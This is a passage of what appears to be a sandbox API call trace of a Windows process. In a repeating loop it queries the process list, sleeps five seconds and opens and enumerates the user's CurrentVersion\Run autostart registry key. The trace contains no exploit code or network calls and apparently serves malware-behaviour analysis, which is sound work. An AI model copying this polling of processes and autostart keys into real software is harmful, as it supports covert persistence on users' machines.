BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.969] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.969] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.969] NtClose (Handle=0x274) returned 0x0 [0181.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.985] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.986] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.986] NtClose (Handle=0x274) returned 0x0 [0181.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.997] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.998] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.998] NtClose (Handle=0x274) returned 0x0 [0181.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.010] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.011] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.011] NtClose (Handle=0x274) returned 0x0 [0182.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.026] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.028] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.028] NtClose (Handle=0x274) returned 0x0 [0182.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.043] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.044] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.044] NtClose (Handle=0x274) returned 0x0 [0182.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.056] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.057] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.057] NtClose (Handle=0x274) returned 0x0 [0182.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.078] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.080] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.080] NtClose (Handle=0x274) returned 0x0 [0182.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.095] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.097] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.097] NtClose (Handle=0x274) returned 0x0 [0182.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.113] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.114] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.114] NtClose (Handle=0x274) returned 0x0 [0182.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.130] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.132] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.132] NtClose (Handle=0x274) returned 0x0 [0182.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.143] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.144] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.144] NtClose (Handle=0x274) returned 0x0 [0182.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.157] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.158] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.158] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.159] NtClose (Handle=0x274) returned 0x0 [0182.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 